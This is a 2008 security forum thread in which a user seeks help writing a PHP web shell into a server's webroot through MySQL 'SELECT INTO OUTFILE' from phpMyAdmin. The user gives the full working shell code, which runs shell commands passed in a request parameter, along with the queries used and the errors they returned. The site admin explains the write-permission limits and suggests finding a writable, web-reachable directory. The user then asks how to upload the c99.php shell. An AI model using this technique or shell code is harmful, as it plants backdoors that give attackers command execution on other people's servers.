|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 44
Members: 0
Total: 44
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
INTO OUTFILE How it work ? |
|
Posted: Thu Apr 10, 2008 9:36 pm |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
i try
SELECT INTO OUTFILE('/home/ftpadmin/jokes/') from ('c:\shell.php');
not working, im trying to upload my shell in webroot directory.
im in phpadmin root. |
|
|
|
|
|
|
|
|
Posted: Thu Apr 10, 2008 10:15 pm |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
i try this, I create a table test and in i put
Code: |
<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>
|
After i Do
Quote: |
SELECT * INTO OUTFILE '/home/ftpadmin/jokes/phpmyadmin/phpinfo.php' from test;
|
And I Receive
Quote: |
#1086 - File '/home/ftpadmin/jokes/phpmyadmin/phpinfo.php' already exists
|
I Try
Quote: |
SELECT * INTO OUTFILE '/home/ftpadmin/jokes/phpmyadmin/test.php' from test;
|
And i receive
Quote: |
#1 - Can't create/write to file '/home/ftpadmin/jokes/phpmyadmin/test.php' (Errcode: 13)
|
Someone can help me with This
Thank ! |
|
|
|
|
|
|
|
|
Posted: Thu Apr 10, 2008 10:29 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
This is exactly how "INTO OUTFILE" suppose to work - it will not overwrite existing files and it can't write files to directory, which is not world-writable (or owner == MySql UID/GID).
So only solution is to find writable directory, which later can be accessed from web |
|
|
|
|
Posted: Thu Apr 10, 2008 10:42 pm |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
ok i foud another directory where i can upload a shell
the problem is i cant do cd .. to go to the previous directory im alway in the dir where i upload the shell.
why ? |
|
|
|
|
Posted: Thu Apr 10, 2008 11:03 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
So you can now execute shell commands?
Not working?
Try:
Can you list "/tmp" directory?
What username and UID you currently have? www? apache? nobody? |
|
|
|
|
Posted: Fri Apr 11, 2008 12:57 am |
|
|
clubreseau |
Advanced user |
|
|
Joined: Apr 10, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
how i can upload c99.php with cmd ? |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|